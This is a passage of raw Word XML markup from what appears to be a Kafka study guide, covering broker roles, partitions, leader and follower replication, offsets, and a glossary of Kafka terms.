          <w:p w14:paraId="30B2407D"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Replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4160BCAC"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Handles data replication between brokers for fault-tolerance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="401B36EB" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38D48FFD"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Metadata Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DA4A358"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Shares topic, partition, and offset info with producers/consumers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F16A7F1" w14:textId="77777777" w:rsidR="00E93F69"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7CA922">
          <v:rect id="_x0000_i3121" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5335A8D5" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9ADCF4" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1310"/>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Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends messages to a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Topic</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1B53DB" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1310"/>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Kafka broker receives the message and stores it in a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6CE2E1" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1310"/>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Each </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is assigned to one or more brokers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F48C85A" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1310"/>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Leader broker</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles all reads and writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663AECD9" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1310"/>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Follower brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> replicate the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D3DF5" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1310"/>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Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> read messages from partitions using the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145EED3F" w14:textId="77777777" w:rsidR="00E93F69"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C714B29">
          <v:rect id="_x0000_i3122" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C04C80" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24439056"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If you have a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3-node Kafka cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F04F1CF" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>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Each broker may host one or more </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBD5F61" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>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Topics are split across brokers for </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B00C328" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>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If broker 1 fails, Kafka reassigns leadership to ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high availability</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674BDB34" w14:textId="77777777" w:rsidR="00E93F69"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15D6945">
          <v:rect id="_x0000_i3123" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64253587" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69"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8"/>
        <w:gridCol w:w="4664"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="1199DB20" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02835B81" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69"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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="045A2714" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="4C3E945C" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56780F37"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Kafka Broker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56EC8F34"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Kafka server that handles messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="78A73120" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17CE586E"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Producer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6223209E"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Sends messages to broker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="2EBEC24D" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41148FC3"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Consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CDBFE7C"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Reads messages from broker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="46AD3054" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6730C2FC"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Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54B53488"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Unit of parallelism in Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="1CDC7E24" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D23E812"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Offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="658AE768"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Position of message in a partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="4DA0B8D1" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51DFDA22"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Leader/Follower</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C026E4" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F6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Leader handles read/write; follower replicates data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29DF0869" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E93F6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79C3BD5">
          <v:rect id="_x0000_i3124" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1E3957" w14:textId="7A4DB914" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC6AFF" w:rsidP="00BC6AFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="775" w:name="_Toc196308255"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Define a Kafka broker and its role in managing topics, partitions, and message replication</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="775"/>
    </w:p>
    <w:p w14:paraId="5E727E1C" w14:textId="26061C97" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Broker</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a server in a Kafka cluster that manages the storage and transmission of messages. It plays a crucial role in </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>managing topics</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message replication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695CDBF9" w14:textId="77777777" w:rsidR="007F0DBD"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FF0EA2F">
          <v:rect id="_x0000_i3125" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6FDD90" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Kafka Broker – Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2093ABB1" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Broker</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message-processing server</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2E58A0" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1312"/>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Accepts messages from </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790ADC38" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1312"/>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Stores them in </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AF5857" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1312"/>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Serves data to </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DCCF28" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1312"/>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Manages </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication and leadership</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
